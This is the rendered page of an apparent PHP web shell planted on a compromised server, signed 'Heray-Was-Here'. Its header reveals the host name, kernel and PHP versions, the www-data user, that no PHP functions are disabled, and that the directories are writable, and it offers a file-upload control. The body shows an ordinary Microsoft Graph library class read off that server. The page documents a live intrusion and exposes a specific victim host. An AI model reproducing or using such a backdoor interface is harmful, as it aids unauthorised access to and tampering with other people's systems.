Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/erp/htdocs/includes/microsoft/microsoft-graph/src/Model/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/erp/htdocs/includes/microsoft/microsoft-graph/src/Model/ServiceUpdateMessageViewpoint.php
<?php
/**
* Copyright (c) Microsoft Corporation.  All Rights Reserved.  Licensed under the MIT License.  See License in the project root for license information.
* 
* ServiceUpdateMessageViewpoint File
* PHP version 7
*
* @category  Library
* @package   Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license   https://opensource.org/licenses/MIT MIT License
* @link      https://graph.microsoft.com
*/
namespace Microsoft\Graph\Model;
/**
* ServiceUpdateMessageViewpoint class
*
* @category  Model
* @package   Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license   https://opensource.org/licenses/MIT MIT License
* @link      https://graph.microsoft.com
*/
class ServiceUpdateMessageViewpoint extends Entity
{
    /**
    * Gets the isArchived
    * Indicates whether the user archived the message.
    *
    * @return bool|null The isArchived
    */
    public function getIsArchived()
    {
        if (array_key_exists("isArchived", $this->_propDict)) {
            return $this->_propDict["isArchived"];
        } else {
            return null;
        }
    }

    /**
    * Sets the isArchived
    * Indicates whether the user archived the message.
    *
    * @param bool $val The value of the isArchived
    *
    * @return ServiceUpdateMessageViewpoint
    */
    public function setIsArchived($val)
    {
        $this->_propDict["isArchived"] = $val;
        return $this;
    }
    /**
    * Gets the isFavorited
    * Indicates whether the user marked the message as favorite.
    *
    * @return bool|null The isFavorited
    */
    public function getIsFavorited()
    {
        if (array_key_exists("isFavorited", $this->_propDict)) {
            return $this->_propDict["isFavorited"];
        } else {
            return null;
        }
    }

    /**
    * Sets the isFavorited
    * Indicates whether the user marked the message as favorite.
    *
    * @param bool $val The value of the isFavorited
    *
    * @return ServiceUpdateMessageViewpoint
    */
    public function setIsFavorited($val)
    {
        $this->_propDict["isFavorited"] = $val;
        return $this;
    }
    /**
    * Gets the isRead
    * Indicates whether the user read the message.
    *
    * @return bool|null The isRead
    */
    public function getIsRead()
    {
        if (array_key_exists("isRead", $this->_propDict)) {
            return $this->_propDict["isRead"];
        } else {
            return null;
        }
    }

    /**
    * Sets the isRead
    * Indicates whether the user read the message.
    *
    * @param bool $val The value of the isRead
    *
    * @return ServiceUpdateMessageViewpoint
    */
    public function setIsRead($val)
    {
        $this->_propDict["isRead"] = $val;
        return $this;
    }
}

Hry